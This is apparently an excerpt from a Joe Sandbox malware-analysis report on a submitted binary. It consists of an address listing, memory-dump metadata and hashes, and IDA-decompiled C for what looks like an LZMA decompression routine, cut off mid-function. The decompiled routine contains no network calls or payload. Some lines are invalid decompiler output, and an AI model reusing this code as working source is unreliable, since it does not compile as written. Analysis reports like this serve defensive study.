                                                0x00000000
                                                0x00000000
                                                0x00406fbb
                                                0x00406fbf
                                                0x00406fc6
                                                0x00406fc9
                                                0x00406fcc
                                                0x00406fd6
                                                0x00000000
                                                0x00406fd6
                                                0x00406fc1
                                                0x00000000
                                                0x00000000
                                                0x00406fe2
                                                0x00406fe6
                                                0x00406fed
                                                0x00406ff0
                                                0x00406ff3
                                                0x00406fe8
                                                0x00406fe8
                                                0x00406fe8
                                                0x00406ff6
                                                0x00406ff9
                                                0x00406ffc
                                                0x00406ffc
                                                0x00406fff
                                                0x00407002
                                                0x00000000
                                                0x00000000
                                                0x004070a2
                                                0x004070a2
                                                0x004070a6
                                                0x00407444
                                                0x00000000
                                                0x00407444
                                                0x004070ac
                                                0x004070af
                                                0x004070b2
                                                0x004070b6
                                                0x004070b9
                                                0x004070bf
                                                0x004070c1
                                                0x004070c1
                                                0x004070c1
                                                0x004070c4
                                                0x004070c7
                                                0x00000000
                                                0x00000000
                                                0x00406c97
                                                0x00406c97
                                                0x00406c9b
                                                0x00407408
                                                0x00000000
                                                0x00407408
                                                0x00406ca1
                                                0x00406ca4
                                                0x00406ca7
                                                0x00406cab
                                                0x00406cae
                                                0x00406cb4
                                                0x00406cb6
                                                0x00406cb6
                                                0x00406cb6
                                                0x00406cb9
                                                0x00406cbc
                                                0x00406cbc
                                                0x00406cbf
                                                0x00406cc2
                                                0x00000000
                                                0x00000000
                                                0x00406cc8
                                                0x00406cce
                                                0x00000000
                                                0x00000000
                                                0x00406cd4
                                                0x00406cd4
                                                0x00406cd8
                                                0x00406cdb
                                                0x00406cde
                                                0x00406ce1
                                                0x00406ce4
                                                0x00406ce5
                                                0x00406ce8
                                                0x00406cea
                                                0x00406cf0
                                                0x00406cf3
                                                0x00406cf6
                                                0x00406cf9
                                                0x00406cfc
                                                0x00406cff
                                                0x00406d02
                                                0x00406d1e
                                                0x00406d21
                                                0x00406d24
                                                0x00406d27
                                                0x00406d2e
                                                0x00406d32
                                                0x00406d34
                                                0x00406d38
                                                0x00406d04
                                                0x00406d04
                                                0x00406d08
                                                0x00406d10
                                                0x00406d15
                                                0x00406d17
                                                0x00406d19
                                                0x00406d19
                                                0x00406d3b
                                                0x00406d42
                                                0x00406d45
                                                0x00000000
                                                0x00406d4b
                                                0x00000000
                                                0x00406d4b
                                                0x00000000
                                                0x00406d50
                                                0x00406d50
                                                0x00406d54
                                                0x00407414
                                                0x00000000
                                                0x00407414
                                                0x00406d5a
                                                0x00406d5d
                                                0x00406d60
                                                0x00406d64
                                                0x00406d67
                                                0x00406d6d
                                                0x00406d6f
                                                0x00406d6f
                                                0x00406d6f
                                                0x00406d72
                                                0x00406d75
                                                0x00406d75
                                                0x00406d75
                                                0x00406d7b
                                                0x00000000
                                                0x00000000
                                                0x00406d7d
                                                0x00406d80
                                                0x00406d83
                                                0x00406d86
                                                0x00406d89
                                                0x00406d8c
                                                0x00406d8f
                                                0x00406d92
                                                0x00406d95
                                                0x00406d98
                                                0x00406d9b
                                                0x00406db3
                                                0x00406db6
                                                0x00406db9
                                                0x00406dbc
                                                0x00406dbc
                                                0x00406dbf
                                                0x00406dc3
                                                0x00406dc5
                                                0x00406d9d
                                                0x00406d9d
                                                0x00406da5
                                                0x00406daa
                                                0x00406dac
                                                0x00406dae
                                                0x00406dae
                                                0x00406dc8
                                                0x00406dcf
                                                0x00406dd2
                                                0x00000000
                                                0x00406dd4
                                                0x00000000
                                                0x00406dd4
                                                0x00406dd2
                                                0x00406dd9
                                                0x00406dd9
                                                0x00406dd9
                                                0x00406dd9
                                                0x00000000
                                                0x00000000
                                                0x00406e14
                                                0x00406e14
                                                0x00406e18
                                                0x00407420
                                                0x00000000
                                                0x00407420
                                                0x00406e1e
                                                0x00406e21
                                                0x00406e24
                                                0x00406e28
                                                0x00406e2b
                                                0x00406e31
                                                0x00406e33
                                                0x00406e33
                                                0x00406e33
                                                0x00406e36
                                                0x00406e39
                                                0x00406e39
                                                0x00406e3f
                                                0x00406ddd
                                                0x00406ddd
                                                0x00406de0
                                                0x00000000
                                                0x00406de0
                                                0x00406e41
                                                0x00406e41
                                                0x00406e44
                                                0x00406e47
                                                0x00406e4a
                                                0x00406e4d
                                                0x00406e50
                                                0x00406e53
                                                0x00406e56
                                                0x00406e59
                                                0x00406e5c
                                                0x00406e5f
                                                0x00406e77
                                                0x00406e7a
                                                0x00406e7d
                                                0x00406e80
                                                0x00406e80
                                                0x00406e83
                                                0x00406e87
                                                0x00406e89
                                                0x00406e61
                                                0x00406e61
                                                0x00406e69
                                                0x00406e6e
                                                0x00406e70
                                                0x00406e72
                                                0x00406e72
                                                0x00406e8c
                                                0x00406e93
                                                0x00406e96
                                                0x00000000
                                                0x00406e98
                                                0x00000000
                                                0x00406e98
                                                0x00000000
                                                0x00407125
                                                0x00407125
                                                0x00407129
                                                0x00407450
                                                0x00000000
                                                0x00407450
                                                0x0040712f
                                                0x00407132
                                                0x00407135
                                                0x00407139
                                                0x0040713c
                                                0x00407142
                                                0x00407144
                                                0x00407144
                                                0x00407144
                                                0x00407147
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00407234
                                                0x00407238
                                                0x0040725a
                                                0x0040725d
                                                0x00407267
                                                0x00000000
                                                0x00407267
                                                0x0040723a
                                                0x0040723d
                                                0x00407241
                                                0x00407244
                                                0x00407244
                                                0x00407247
                                                0x00000000
                                                0x00000000
                                                0x004072f1
                                                0x004072f5
                                                0x00407313
                                                0x00407313
                                                0x00407313
                                                0x0040731a
                                                0x00407321
                                                0x00407328
                                                0x00407328
                                                0x00000000
                                                0x00407328
                                                0x004072f7
                                                0x004072fa
                                                0x004072fd
                                                0x00407300
                                                0x00407307
                                                0x0040724b
                                                0x0040724b
                                                0x0040724e
                                                0x00000000
                                                0x00000000
                                                0x004073e2
                                                0x004073e5
                                                0x00000000
                                                0x00000000
                                                0x0040701c
                                                0x0040701e
                                                0x00407025
                                                0x00407026
                                                0x00407028
                                                0x0040702b
                                                0x00000000
                                                0x00000000
                                                0x00407033
                                                0x00407036
                                                0x00407039
                                                0x0040703b
                                                0x0040703d
                                                0x0040703d
                                                0x0040703e
                                                0x00407041
                                                0x00407048
                                                0x0040704b
                                                0x00407059
                                                0x00000000
                                                0x00000000
                                                0x0040732f
                                                0x0040732f
                                                0x00407332
                                                0x00407339
                                                0x00000000
                                                0x00000000
                                                0x0040733e
                                                0x0040733e
                                                0x00407342
                                                0x0040747a
                                                0x00000000
                                                0x0040747a
                                                0x00407348
                                                0x0040734b
                                                0x0040734e
                                                0x00407352
                                                0x00407355
                                                0x0040735b
                                                0x0040735d
                                                0x0040735d
                                                0x0040735d
                                                0x00407360
                                                0x00407363
                                                0x00407363
                                                0x00407363
                                                0x00407363
                                                0x00407366
                                                0x00407366
                                                0x0040736a
                                                0x004073ca
                                                0x004073cd
                                                0x004073d2
                                                0x004073d3
                                                0x004073d5
                                                0x004073d7
                                                0x004073da
                                                0x00000000
                                                0x004073da
                                                0x0040736c
                                                0x00407372
                                                0x00407375
                                                0x00407378
                                                0x0040737b
                                                0x0040737e
                                                0x00407381
                                                0x00407384
                                                0x00407387
                                                0x0040738a
                                                0x0040738d
                                                0x004073a6
                                                0x004073a9
                                                0x004073ac
                                                0x004073af
                                                0x004073b3
                                                0x004073b5
                                                0x004073b5
                                                0x004073b6
                                                0x004073b9
                                                0x0040738f
                                                0x0040738f
                                                0x00407397
                                                0x0040739c
                                                0x0040739e
                                                0x004073a1
                                                0x004073a1
                                                0x004073bc
                                                0x004073c3
                                                0x00000000
                                                0x004073c5
                                                0x00000000
                                                0x004073c5
                                                0x00000000
                                                0x00407061
                                                0x00407064
                                                0x0040709a
                                                0x004071ca
                                                0x004071ca
                                                0x004071ca
                                                0x004071ca
                                                0x004071cd
                                                0x004071cd
                                                0x004071d0
                                                0x004071d2
                                                0x0040745c
                                                0x00000000
                                                0x0040745c
                                                0x004071d8
                                                0x004071db
                                                0x00000000
                                                0x00000000
                                                0x004071e1
                                                0x004071e5
                                                0x004071e8
                                                0x004071e8
                                                0x004071e8
                                                0x00000000
                                                0x004071e8
                                                0x00407066
                                                0x00407068
                                                0x0040706a
                                                0x0040706c
                                                0x0040706f
                                                0x00407070
                                                0x00407072
                                                0x00407074
                                                0x00407077
                                                0x0040707a
                                                0x00407090
                                                0x00407095
                                                0x004070cd
                                                0x004070cd
                                                0x004070d1
                                                0x004070fd
                                                0x004070ff
                                                0x00407106
                                                0x00407109
                                                0x0040710c
                                                0x0040710c
                                                0x00407111
                                                0x00407111
                                                0x00407113
                                                0x00407116
                                                0x0040711d
                                                0x00407120
                                                0x0040714d
                                                0x0040714d
                                                0x00407150
                                                0x00407153
                                                0x004071c7
                                                0x004071c7
                                                0x004071c7
                                                0x00000000
                                                0x004071c7
                                                0x00407155
                                                0x0040715b
                                                0x0040715e
                                                0x00407161
                                                0x00407164
                                                0x00407167
                                                0x0040716a
                                                0x0040716d
                                                0x00407170
                                                0x00407173
                                                0x00407176
                                                0x0040718f
                                                0x00407191
                                                0x00407194
                                                0x00407195
                                                0x00407198
                                                0x0040719a
                                                0x0040719d
                                                0x0040719f
                                                0x004071a1
                                                0x004071a4
                                                0x004071a6
                                                0x004071a9
                                                0x004071ad
                                                0x004071af
                                                0x004071af
                                                0x004071b0
                                                0x004071b3
                                                0x004071b6
                                                0x00407178
                                                0x00407178
                                                0x00407180
                                                0x00407185
                                                0x00407187
                                                0x0040718a
                                                0x0040718a
                                                0x004071b9
                                                0x004071c0
                                                0x0040714a
                                                0x0040714a
                                                0x0040714a
                                                0x0040714a
                                                0x00000000
                                                0x004071c2
                                                0x00000000
                                                0x004071c2
                                                0x004071c0
                                                0x004070d3
                                                0x004070d6
                                                0x004070d8
                                                0x004070db
                                                0x004070de
                                                0x004070e1
                                                0x004070e3
                                                0x004070e6
                                                0x004070e9
                                                0x004070e9
                                                0x004070ec
                                                0x004070ec
                                                0x004070ef
                                                0x004070f6
                                                0x004070ca
                                                0x004070ca
                                                0x004070ca
                                                0x004070ca
                                                0x00000000
                                                0x004070f8
                                                0x00000000
                                                0x004070f8
                                                0x004070f6
                                                0x0040707c
                                                0x0040707f
                                                0x00407081
                                                0x00407084
                                                0x00000000
                                                0x00000000
                                                0x00406de3
                                                0x00406de3
                                                0x00406de7
                                                0x0040742c
                                                0x00000000
                                                0x0040742c
                                                0x00406ded
                                                0x00406df0
                                                0x00406df3
                                                0x00406df6
                                                0x00406df9
                                                0x00406dfc
                                                0x00406dff
                                                0x00406e01
                                                0x00406e04
                                                0x00406e07
                                                0x00406e0a
                                                0x00406e0c
                                                0x00406e0c
                                                0x00406e0c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004071eb
                                                0x004071eb
                                                0x004071eb
                                                0x004071ef
                                                0x00000000
                                                0x00000000
                                                0x004071f5
                                                0x004071f8
                                                0x004071fb
                                                0x004071fe
                                                0x00407200
                                                0x00407200
                                                0x00407200
                                                0x00407203
                                                0x00407206
                                                0x00407209
                                                0x0040720c
                                                0x0040720f
                                                0x00407212
                                                0x00407213
                                                0x00407215
                                                0x00407215
                                                0x00407215
                                                0x00407218
                                                0x0040721b
                                                0x0040721e
                                                0x00407221
                                                0x00407224
                                                0x00407228
                                                0x0040722a
                                                0x0040722d
                                                0x00000000
                                                0x0040722f
                                                0x00000000
                                                0x0040722f
                                                0x0040722d
                                                0x00407462
                                                0x00000000
                                                0x00000000
                                                0x00406a91

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
                                                • Instruction ID: 00773887ea3243dfb52df8404d42644f62a25abb174058b9e5a1e26f950428c6
                                                • Opcode Fuzzy Hash: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
                                                • Instruction Fuzzy Hash: 27813671D04229CFDF24CFA8C8847ADBBB1FB44305F24816AD856BB281C7786A86DF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 98%
                                                			E00406A4F(void* __ecx) {
                                                				void* _v8;
                                                				void* _v12;
                                                				signed int _v16;
                                                				unsigned int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				signed int _v48;
                                                				signed int _v52;
                                                				signed int _v56;
                                                				signed int _v60;
                                                				signed int _v64;
                                                				signed int _v68;
                                                				signed int _v72;
                                                				signed int _v76;
                                                				signed int _v80;
                                                				signed int _v84;
                                                				signed int _v88;
                                                				signed int _v92;
                                                				signed int _v95;
                                                				signed int _v96;
                                                				signed int _v100;
                                                				signed int _v104;
                                                				signed int _v108;
                                                				signed int _v112;
                                                				signed int _v116;
                                                				signed int _v120;
                                                				intOrPtr _v124;
                                                				signed int _v128;
                                                				signed int _v132;
                                                				signed int _v136;
                                                				void _v140;
                                                				void* _v148;
                                                				signed int _t537;
                                                				signed int _t538;
                                                				signed int _t572;
                                                
                                                				_t572 = 0x22;
                                                				_v148 = __ecx;
                                                				memcpy( &_v140, __ecx, _t572 << 2);
                                                				if(_v52 == 0xffffffff) {
                                                					return 1;
                                                				}
                                                				while(1) {
                                                					L3:
                                                					_t537 = _v140;
                                                					if(_t537 > 0x1c) {
                                                						break;
                                                					}
                                                					switch( *((intOrPtr*)(_t537 * 4 +  &M004074A1))) {
                                                						case 0:
                                                							__eflags = _v112;
                                                							if(_v112 == 0) {
                                                								goto L173;
                                                							}
                                                							_v112 = _v112 - 1;
                                                							_v116 = _v116 + 1;
                                                							_t537 =  *_v116;
                                                							__eflags = _t537 - 0xe1;
                                                							if(_t537 > 0xe1) {
                                                								goto L174;
                                                							}
                                                							_t542 = _t537 & 0x000000ff;
                                                							_push(0x2d);
                                                							asm("cdq");
                                                							_pop(_t576);
                                                							_push(9);
                                                							_pop(_t577);
                                                							_t622 = _t542 / _t576;
                                                							_t544 = _t542 % _t576 & 0x000000ff;
                                                							asm("cdq");
                                                							_t617 = _t544 % _t577 & 0x000000ff;
                                                							_v64 = _t617;
                                                							_v32 = (1 << _t622) - 1;
                                                							_v28 = (1 << _t544 / _t577) - 1;
                                                							_t625 = (0x300 << _t617 + _t622) + 0x736;
                                                							__eflags = 0x600 - _v124;
                                                							if(0x600 == _v124) {
                                                								L12:
                                                								__eflags = _t625;
                                                								if(_t625 == 0) {
                                                									L14:
                                                									_v76 = _v76 & 0x00000000;
                                                									_v68 = _v68 & 0x00000000;
                                                									goto L17;
                                                								} else {
                                                									goto L13;
                                                								}
                                                								do {
                                                									L13:
                                                									_t625 = _t625 - 1;
                                                									__eflags = _t625;
                                                									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                                                								} while (_t625 != 0);
                                                								goto L14;
                                                							}
                                                							__eflags = _v8;
                                                							if(_v8 != 0) {
                                                								GlobalFree(_v8); // executed
                                                							}
                                                							_t537 = GlobalAlloc(0x40, 0x600); // executed
                                                							__eflags = _t537;
                                                							_v8 = _t537;
                                                							if(_t537 == 0) {
                                                								goto L174;
                                                							} else {
                                                								_v124 = 0x600;
                                                								goto L12;
                                                							}
                                                						case 1:
                                                							L15:
                                                							__eflags = _v112;
                                                							if(_v112 == 0) {
                                                								_v140 = 1;
                                                								goto L173;
                                                							}
                                                							_v112 = _v112 - 1;
                                                							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                                                							_v116 = _v116 + 1;
                                                							_t50 =  &_v76;
                                                							 *_t50 = _v76 + 1;
                                                							__eflags =  *_t50;
                                                							L17:
                                                							__eflags = _v76 - 4;
                                                							if(_v76 < 4) {
                                                								goto L15;
                                                							}
                                                							_t550 = _v68;
                                                							__eflags = _t550 - _v120;
                                                							if(_t550 == _v120) {
                                                								L22:
                                                								_v76 = 5;
                                                								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                                                								goto L25;
                                                							}
                                                							__eflags = _v12;
                                                							_v120 = _t550;
                                                							if(_v12 != 0) {
                                                								GlobalFree(_v12); // executed
                                                							}
                                                							_t537 = GlobalAlloc(0x40, _v68); // executed
                                                							__eflags = _t537;
                                                							_v12 = _t537;
                                                							if(_t537 == 0) {
                                                								goto L174;
                                                							} else {
                                                								goto L22;
                                                							}
                                                						case 2:
                                                							L26:
                                                							_t557 = _v100 & _v32;
                                                							_v136 = 6;
                                                							_v80 = _t557;
                                                							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                                                							goto L135;
                                                						case 3:
                                                							L23:
                                                							__eflags = _v112;
                                                							if(_v112 == 0) {
                                                								_v140 = 3;
                                                								goto L173;
                                                							}
                                                							_v112 = _v112 - 1;
                                                							_t72 =  &_v116;
                                                							 *_t72 = _v116 + 1;
                                                							__eflags =  *_t72;
                                                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							L25:
                                                							_v76 = _v76 - 1;
                                                							__eflags = _v76;
                                                							if(_v76 != 0) {
                                                								goto L23;
                                                							}
                                                							goto L26;
                                                						case 4:
                                                							L136:
                                                							_t559 =  *_t626;
                                                							_t610 = _t559 & 0x0000ffff;
                                                							_t591 = (_v20 >> 0xb) * _t610;
                                                							__eflags = _v16 - _t591;
                                                							if(_v16 >= _t591) {
                                                								_v20 = _v20 - _t591;
                                                								_v16 = _v16 - _t591;
                                                								_v68 = 1;
                                                								_t560 = _t559 - (_t559 >> 5);
                                                								__eflags = _t560;
                                                								 *_t626 = _t560;
                                                							} else {
                                                								_v20 = _t591;
                                                								_v68 = _v68 & 0x00000000;
                                                								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                                                							}
                                                							__eflags = _v20 - 0x1000000;
                                                							if(_v20 >= 0x1000000) {
                                                								goto L142;
                                                							} else {
                                                								goto L140;
                                                							}
                                                						case 5:
                                                							L140:
                                                							__eflags = _v112;
                                                							if(_v112 == 0) {
                                                								_v140 = 5;
                                                								goto L173;
                                                							}
                                                							_v20 = _v20 << 8;
                                                							_v112 = _v112 - 1;
                                                							_t464 =  &_v116;
                                                							 *_t464 = _v116 + 1;
                                                							__eflags =  *_t464;
                                                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							L142:
                                                							_t561 = _v136;
                                                							goto L143;
                                                						case 6:
                                                							__edx = 0;
                                                							__eflags = _v68;
                                                							if(_v68 != 0) {
                                                								__eax = _v8;
                                                								__ecx = _v60;
                                                								_v56 = 1;
                                                								_v136 = 7;
                                                								__esi = _v8 + 0x180 + _v60 * 2;
                                                								goto L135;
                                                							}
                                                							__eax = _v96 & 0x000000ff;
                                                							__esi = _v100;
                                                							__cl = 8;
                                                							__cl = 8 - _v64;
                                                							__esi = _v100 & _v28;
                                                							__eax = (_v96 & 0x000000ff) >> 8;
                                                							__ecx = _v64;
                                                							__esi = (_v100 & _v28) << 8;
                                                							__ecx = _v8;
                                                							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                                                							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                                                							__eflags = _v60 - 4;
                                                							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                							if(_v60 >= 4) {
                                                								__eflags = _v60 - 0xa;
                                                								if(_v60 >= 0xa) {
                                                									_t103 =  &_v60;
                                                									 *_t103 = _v60 - 6;
                                                									__eflags =  *_t103;
                                                								} else {
                                                									_v60 = _v60 - 3;
                                                								}
                                                							} else {
                                                								_v60 = 0;
                                                							}
                                                							__eflags = _v56 - __edx;
                                                							if(_v56 == __edx) {
                                                								__ebx = 0;
                                                								__ebx = 1;
                                                								goto L63;
                                                							}
                                                							__eax = _v24;
                                                							__eax = _v24 - _v48;
                                                							__eflags = __eax - _v120;
                                                							if(__eax >= _v120) {
                                                								__eax = __eax + _v120;
                                                								__eflags = __eax;
                                                							}
                                                							__ecx = _v12;
                                                							__ebx = 0;
                                                							__ebx = 1;
                                                							__al =  *((intOrPtr*)(__eax + __ecx));
                                                							_v95 =  *((intOrPtr*)(__eax + __ecx));
                                                							goto L43;
                                                						case 7:
                                                							__eflags = _v68 - 1;
                                                							if(_v68 != 1) {
                                                								__eax = _v40;
                                                								_v132 = 0x16;
                                                								_v36 = _v40;
                                                								__eax = _v44;
                                                								_v40 = _v44;
                                                								__eax = _v48;
                                                								_v44 = _v48;
                                                								__eax = 0;
                                                								__eflags = _v60 - 7;
                                                								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                								__al = __al & 0x000000fd;
                                                								__eax = (__eflags >= 0) - 1 + 0xa;
                                                								_v60 = (__eflags >= 0) - 1 + 0xa;
                                                								__eax = _v8;
                                                								__eax = _v8 + 0x664;
                                                								__eflags = __eax;
                                                								_v92 = __eax;
                                                								goto L71;
                                                							}
                                                							__eax = _v8;
                                                							__ecx = _v60;
                                                							_v136 = 8;
                                                							__esi = _v8 + 0x198 + _v60 * 2;
                                                							goto L135;
                                                						case 8:
                                                							__eflags = _v68;
                                                							if(_v68 != 0) {
                                                								__eax = _v8;
                                                								__ecx = _v60;
                                                								_v136 = 0xa;
                                                								__esi = _v8 + 0x1b0 + _v60 * 2;
                                                							} else {
                                                								__eax = _v60;
                                                								__ecx = _v8;
                                                								__eax = _v60 + 0xf;
                                                								_v136 = 9;
                                                								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                                                								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                                                							}
                                                							goto L135;
                                                						case 9:
                                                							__eflags = _v68;
                                                							if(_v68 != 0) {
                                                								goto L92;
                                                							}
                                                							__eflags = _v100;
                                                							if(_v100 == 0) {
                                                								goto L174;
                                                							}
                                                							__eax = 0;
                                                							__eflags = _v60 - 7;
                                                							_t264 = _v60 - 7 >= 0;
                                                							__eflags = _t264;
                                                							0 | _t264 = _t264 + _t264 + 9;
                                                							_v60 = _t264 + _t264 + 9;
                                                							goto L78;
                                                						case 0xa:
                                                							__eflags = _v68;
                                                							if(_v68 != 0) {
                                                								__eax = _v8;
                                                								__ecx = _v60;
                                                								_v136 = 0xb;
                                                								__esi = _v8 + 0x1c8 + _v60 * 2;
                                                								goto L135;
                                                							}
                                                							__eax = _v44;
                                                							goto L91;
                                                						case 0xb:
                                                							__eflags = _v68;
                                                							if(_v68 != 0) {
                                                								__ecx = _v40;
                                                								__eax = _v36;
                                                								_v36 = _v40;
                                                							} else {
                                                								__eax = _v40;
                                                							}
                                                							__ecx = _v44;
                                                							_v40 = _v44;
                                                							L91:
                                                							__ecx = _v48;
                                                							_v48 = __eax;
                                                							_v44 = _v48;
                                                							L92:
                                                							__eax = _v8;
                                                							_v132 = 0x15;
                                                							__eax = _v8 + 0xa68;
                                                							_v92 = _v8 + 0xa68;
                                                							goto L71;
                                                						case 0xc:
                                                							L102:
                                                							__eflags = _v112;
                                                							if(_v112 == 0) {
                                                								_v140 = 0xc;
                                                								goto L173;
                                                							}
                                                							__ecx = _v116;
                                                							__eax = _v16;
                                                							_v20 = _v20 << 8;
                                                							__ecx =  *_v116 & 0x000000ff;
                                                							_v112 = _v112 - 1;
                                                							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							_t340 =  &_v116;
                                                							 *_t340 = _v116 + 1;
                                                							__eflags =  *_t340;
                                                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							__eax = _v48;
                                                							goto L104;
                                                						case 0xd:
                                                							L39:
                                                							__eflags = _v112;
                                                							if(_v112 == 0) {
                                                								_v140 = 0xd;
                                                								goto L173;
                                                							}
                                                							__ecx = _v116;
                                                							__eax = _v16;
                                                							_v20 = _v20 << 8;
                                                							__ecx =  *_v116 & 0x000000ff;
                                                							_v112 = _v112 - 1;
                                                							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							_t127 =  &_v116;
                                                							 *_t127 = _v116 + 1;
                                                							__eflags =  *_t127;
                                                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							L41:
                                                							__eax = _v68;
                                                							__eflags = _v76 - _v68;
                                                							if(_v76 != _v68) {
                                                								goto L50;
                                                							}
                                                							__eflags = __ebx - 0x100;
                                                							if(__ebx >= 0x100) {
                                                								goto L56;
                                                							}
                                                							L43:
                                                							__eax = _v95 & 0x000000ff;
                                                							_v95 = _v95 << 1;
                                                							__ecx = _v92;
                                                							__eax = (_v95 & 0x000000ff) >> 7;
                                                							_v76 = __eax;
                                                							__eax = __eax + 1;
                                                							__eax = __eax << 8;
                                                							__eax = __eax + __ebx;
                                                							__esi = _v92 + __eax * 2;
                                                							_v20 = _v20 >> 0xb;
                                                							__ax =  *__esi;
                                                							_v88 = __esi;
                                                							__edx = __ax & 0x0000ffff;
                                                							__ecx = (_v20 >> 0xb) * __edx;
                                                							__eflags = _v16 - __ecx;
                                                							if(_v16 >= __ecx) {
                                                								_v20 = _v20 - __ecx;
                                                								_v16 = _v16 - __ecx;
                                                								__cx = __ax;
                                                								_v68 = 1;
                                                								__cx = __ax >> 5;
                                                								__eflags = __eax;
                                                								__ebx = __ebx + __ebx + 1;
                                                								 *__esi = __ax;
                                                							} else {
                                                								_v68 = _v68 & 0x00000000;
                                                								_v20 = __ecx;
                                                								0x800 = 0x800 - __edx;
                                                								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                								__ebx = __ebx + __ebx;
                                                								 *__esi = __cx;
                                                							}
                                                							__eflags = _v20 - 0x1000000;
                                                							_v72 = __ebx;
                                                							if(_v20 >= 0x1000000) {
                                                								goto L41;
                                                							} else {
                                                								goto L39;
                                                							}
                                                						case 0xe:
                                                							L48:
                                                							__eflags = _v112;
                                                							if(_v112 == 0) {
                                                								_v140 = 0xe;
                                                								goto L173;
                                                							}
                                                							__ecx = _v116;
                                                							__eax = _v16;
                                                							_v20 = _v20 << 8;
                                                							__ecx =  *_v116 & 0x000000ff;
                                                							_v112 = _v112 - 1;
                                                							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							_t161 =  &_v116;
                                                							 *_t161 = _v116 + 1;
                                                							__eflags =  *_t161;
                                                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							while(1) {
                                                								L50:
                                                								__eflags = __ebx - 0x100;
                                                								if(__ebx >= 0x100) {
                                                									break;
                                                								}
                                                								__eax = _v92;
                                                								__edx = __ebx + __ebx;
                                                								__ecx = _v20;
                                                								__esi = __edx + __eax;
                                                								__ecx = _v20 >> 0xb;
                                                								__ax =  *__esi;
                                                								_v88 = __esi;
                                                								__edi = __ax & 0x0000ffff;
                                                								__ecx = (_v20 >> 0xb) * __edi;
                                                								__eflags = _v16 - __ecx;
                                                								if(_v16 >= __ecx) {
                                                									_v20 = _v20 - __ecx;
                                                									_v16 = _v16 - __ecx;
                                                									__cx = __ax;
                                                									_t175 = __edx + 1; // 0x1
                                                									__ebx = _t175;
                                                									__cx = __ax >> 5;
                                                									__eflags = __eax;
                                                									 *__esi = __ax;
                                                								} else {
                                                									_v20 = __ecx;
                                                									0x800 = 0x800 - __edi;
                                                									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                									__ebx = __ebx + __ebx;
                                                									 *__esi = __cx;
                                                								}
                                                								__eflags = _v20 - 0x1000000;
                                                								_v72 = __ebx;
                                                								if(_v20 >= 0x1000000) {
                                                									continue;
                                                								} else {
                                                									goto L48;
                                                								}
                                                							}
                                                							L56:
                                                							_t178 =  &_v56;
                                                							 *_t178 = _v56 & 0x00000000;
                                                							__eflags =  *_t178;
                                                							goto L57;
                                                						case 0xf:
                                                							L60:
                                                							__eflags = _v112;
                                                							if(_v112 == 0) {
                                                								_v140 = 0xf;
                                                								goto L173;
                                                							}
                                                							__ecx = _v116;
                                                							__eax = _v16;
                                                							_v20 = _v20 << 8;
                                                							__ecx =  *_v116 & 0x000000ff;
                                                							_v112 = _v112 - 1;
                                                							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
